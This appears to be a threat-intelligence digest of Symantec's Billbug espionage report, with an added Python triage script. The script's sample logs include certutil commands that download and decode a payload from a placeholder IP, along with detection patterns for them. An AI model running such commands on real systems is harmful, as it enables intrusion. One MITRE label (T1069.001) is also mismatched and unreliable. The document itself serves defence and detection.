Symantec attributes state-sponsored activity to Billbug (aka Thrip/Lotus Blossom), targeting a certificate authority and government/defense agencies across Asia since March 2022. The operation employs dual-use tools and backdoors (Hannotog and Sagerunex), uses the Stowaway proxy tool for C2 over HTTPS, and shows espionage motivations with potential for certificate abuse, though according to Symantec no certificates were compromised. #Billbug #Thrip #Hannotog #Sagerunex #StowawayProxyTool #CertificateAuthority #AsianGovernments
Keypoints
- Billbug (aka Thrip/Lotus Blossom) is linked to a campaign targeting a certificate authority and government/defense agencies in Asia, active since March 2022.
- The attackers appear to gain initial access via public-facing applications and deploy backdoors (Hannotog and Sagerunex) using loaders.
- A wide set of dual-use tools is employed to map networks and exfiltrate data, including AdFind, Winmail, WinRAR, Ping, Tracert, Route, NBTscan, Certutil, and a port scanner.
- The Sagerunex backdoor uses multiple encryption and obfuscation techniques (XOR, AES-256-CBC, RC4) and communicates over encrypted channels to its C2 server.
- Stowaway Proxy Tool is downloaded to enable multi-hop proxying, illustrating use of pentesting tools for intranet access bypass.
- The campaign’s stated motive is espionage/data theft, with victims including a certificate authority and Asian government agencies; Symantec notified the CA but found no evidence of certificate compromise.
- Protection updates and indicators of compromise are provided by Symantec for defense and detection.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – The attackers are exploiting public-facing applications to gain initial access to victim networks. ‘There are some indications that the attackers are exploiting public-facing applications to gain initial access to victim networks.’
- [T1069.001] Active Directory Discovery – AdFind is used to query Active Directory to map a network. ‘A publicly available tool that is used to query Active Directory. It has legitimate uses but is widely used by attackers to help map a network.’
- [T1046] Network Service Scanning – Discovery tools (Ping, Tracert, Route, NBTscan, port scanner) are used to map the network and identify reachable paths. ‘A tool that is freely available online that can allow users to determine if a specific location on a network is responding.’
- [T1560.001] Archive Collected Data – WinRAR is used to archive or zip files prior to exfiltration. ‘An archive manager that can be used to archive or zip files – for example, prior to exfiltration.’
- [T1105] Ingress Tool Transfer – Certutil is used to download files and decode information from the network. ‘Microsoft Windows utility that can be used for various malicious purposes, such as to decode information, to download files, and to install browser root certificates.’
- [T1071] Web Protocols – C2 communications over HTTPS with multiple proxy options. ‘In normal mode, the sample will try all the following supported connection modes in this order. In all cases, HTTPS is used, with user agent equal to: Mozilla/5.0 (compatible; MSIE 7.0; Win32).’
- [T1090] Proxy – Stowaway Proxy Tool is used to proxy external traffic through multiple nodes in the intranet. ‘Stowaway is a multi-level proxy tool written in the Go language and intended for use by penetration testers… proxy external traffic to the intranet through multiple nodes.’
- [T1027] Obfuscated/Compressed Files and Information – The Sagerunex communications and payloads are encrypted/opaque (XOR, AES-256-CBC, RC4). ‘The encryption key is hardcoded… The same encryption algorithm is used for network communication.’
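As an added illustration, not code from Symantec's report, the following Python triage routine flags the Sagerunex user agent quoted under T1071 and the certutil and AdFind usage quoted under T1105 and T1069.001 in a handful of constructed proxy and process-creation events; the pipe-delimited log format, host names and addresses are assumptions.

```python
import re

# Constructed sample telemetry (not from the report): proxy and process-creation
# lines in an assumed "source|field=value|..." format.
SAMPLE_EVENTS = [
    'proxy|host=ws01|ua=Mozilla/5.0 (compatible; MSIE 7.0; Win32)|dst=203.0.113.10:443',
    'proxy|host=ws02|ua=Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/118.0|dst=198.51.100.7:443',
    'process|host=ws01|cmd=certutil.exe -urlcache -split -f http://203.0.113.10/update.dat C:\\Users\\Public\\u.dat',
    'process|host=ws03|cmd=certutil.exe -decode C:\\Users\\Public\\u.txt C:\\Users\\Public\\u.exe',
    'process|host=ws04|cmd=certutil.exe -verify cert.cer',
    'process|host=ws05|cmd=AdFind.exe -f objectcategory=computer',
]

# Exact user agent string quoted in the report for Sagerunex C2 over HTTPS.
SAGERUNEX_UA = "Mozilla/5.0 (compatible; MSIE 7.0; Win32)"

# certutil switches that fetch (-urlcache) or decode (-decode) content; other
# switches such as -verify are treated as ordinary administrative use.
CERTUTIL_TRANSFER = re.compile(r"certutil(?:\.exe)?\s.*?(-urlcache|-decode)", re.IGNORECASE)

def parse_event(line):
    """Split one pipe-delimited line into a dict; the first field is the source."""
    parts = line.split('|')
    event = {'source': parts[0]}
    for kv in parts[1:]:
        key, _, value = kv.partition('=')   # keep '=' inside values intact
        event[key] = value
    return event

def classify(event):
    """Return (technique, reason) tuples for one event, using the page's mappings."""
    hits = []
    if event['source'] == 'proxy' and event.get('ua') == SAGERUNEX_UA:
        hits.append(('T1071', 'user agent matches Sagerunex C2 string'))
    if event['source'] == 'process':
        cmd = event.get('cmd', '')
        m = CERTUTIL_TRANSFER.search(cmd)
        if m:
            hits.append(('T1105', f'certutil used with {m.group(1)}'))
        if re.search(r'(^|\\)adfind(\.exe)?\b', cmd, re.IGNORECASE):
            hits.append(('T1069.001', 'AdFind used'))  # mapping as given on the page
    return hits

def scan(lines):
    """Map host -> observed (technique, reason) list, so hosts hitting several stages stand out."""
    findings = {}
    for line in lines:
        ev = parse_event(line)
        for tech, reason in classify(ev):
            findings.setdefault(ev['host'], []).append((tech, reason))
    return findings
```

A host that appears with both T1071 and T1105, as ws01 does in the sample, is the one to escalate first.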
Indicators of Compromise
- [File hash] – 072022b54085690001ff9ec546051b2f60564ffbf5b917ac1f5a0e3abe7254a5, 0cc6285d4bfcb5de4ebe58a7eab9b8d25dfcfeb12676b0c084e8705e69f6f281; context: Hashes associated with the campaign’s components and loaders (multiple hashes listed in the article)